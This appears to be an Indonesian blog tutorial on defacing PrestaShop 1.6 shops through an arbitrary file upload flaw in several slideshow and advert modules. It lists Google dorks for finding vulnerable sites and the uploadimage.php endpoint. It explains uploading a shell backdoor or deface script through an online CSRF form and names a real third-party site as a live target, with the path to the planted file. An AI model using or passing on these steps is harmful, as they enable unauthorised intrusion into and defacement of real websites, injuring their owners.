Cara Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload

Bahan-Bahan

1. Dork : inurl:"/modules/simpleslideshow/"
inurl:"/modules/productpageadverts/"

                   inurl:"/modules/homepageadvertise/"
                   inurl:"/modules/columnadverts/"
2. Exploit : /uploadimage.php
3. CSRF :  CSRF ONLINE
4. Shell backdoor atau script deface
5. Sabar 😂

- Dorking dengan dork diatas tapi disini saya ada live target "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/"
- Lalu masukan exploit nya jadi seperti ini
"http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/uploadimage.php"
- Jika ada tulisan error seperti ini.

- itu tandanya vuln tinggal kita masukan sitenya ke CSRF seperti gambar di
bawah ini, dengan POSTFILE : userfile

- lalu klik submit, setelah itu pilih file yang ingin kalian upload lalu klik upload

-Jika berhasil maka akan muncul "success:namafilekalian.extensi" seperti di gambar di bawah

- Lalu tinggal kita akses, dimana aksesnya ??, yaitu di
"/modules/namamodules/slides/filekalian"
- Seperti ini "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/slides/luv.gif"
- Dan yap kita sudah berhasil

ok mungkin cukup sekian tutorial dari saya
see you on the next tutorial

Cara Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload

0 Response to "Cara Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload"

Post a Comment

Cara Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload

Related Posts:

0 Response to "Cara Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload"

Post a Comment